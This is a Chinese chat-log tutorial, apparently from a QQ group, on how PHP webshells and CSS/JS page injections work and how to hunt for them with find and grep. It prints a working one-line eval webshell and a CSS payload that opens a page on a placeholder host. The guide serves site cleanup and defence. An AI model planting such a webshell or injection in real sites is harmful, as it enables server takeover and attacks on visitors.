交谈中请勿轻信汇款、中奖信息、陌生电话,勿使用外挂软件。
rickyleo(475031440) 17:26:39
一、木马原理(php)
1、php中几乎所有的木马都会带有"eval"这个函数。eval() 函数把字符串按照 PHP 代码来计算。即我们用post或get方式在浏览器中提交一串php代码这个代码就会被执行,当然还有很多木马是加密成字符串后使用eval函数来执行的。
举例:服务器上有几个木马是一句话木马代码结构如下:<?php
eval($_POST['tt']);?>
我们只要向服务器以POST方式提交tt这个变量,这个变量里的所有代码都会被执行.
2、fopen函数,木马要向服务器写入或改变文件肯定会使用到文件操作函数,一般都会在木马文件中出现fopen这个函数,即使是一句话木马(如上),在 post方式中提交的代码中也会出现fopen函数。
二、css、js挂马
1、使用firebug检查,如果网站能打开,我们可以使用FF的firebug来查看载入的连接,从中发现可疑连接
2、掌握原理文件查找:
css中一般有二种挂马方式:
1、在body中通过background-image 来加载木马文件如:
background-image:url(t:open("http://
www.X.com/muma.htm","newwindow","border="1"Height=0,Width=0,top=1000,center=0,toolbar=no,menubar=no.crollbars=no,resizable=no,location=no,status=no"))
2、使用expression将css与js关联起来执行
JS中的挂马:
js中挂马方式多样,可以使用load方式加载js也可以使用 document.write方式输出js连接。还可以生成iframe方式等。但只要木马文件不在你服务器上就必须有http,所以我们可以通过在js中搜索http来找到相应的木马,我们官方论坛的js中有大量的http所以大要有有耐心。
三、如果快速查找
了解了木马文件的几个特性后我们就可以根据这些关健词来快速查找了。
Linux命令行
find /home/webtest/ -type f -name "*.php" |xargs grep "eval(" > /home/webtest/kedumine.txt
这样就把所有php中的文件中带有“eval(”内容的文件找出来了并放在kedumin.txt这个文件中,打开这个文件看一下就可以找到7个php木马(注:并不是所有的文件都是php木马哦。)
find /home/webtest/ -type f -name "*.php" |xargs grep "fopen(" > /home/webtest/kedumine.txt 就能找到另外二个php木马和后门(所谓后门就是看上去不是木马,但是黑客可以通过后门来上传木马,如:require/db_mysqld.php 这个文件,这是我写的模拟文件没测试过哦。)
find /home/webtest/ -type f -name "*.htm" |xargs grep "http" > /home/webtest/kedumine.txt 就能找到css中的木马文件,因为data/style下的css是用htm命命名的,所以我这里使用*.html,我们在给客户查的时候也需要搜索下*.css
JS中的木马我就不举例了,大家自己去找吧。
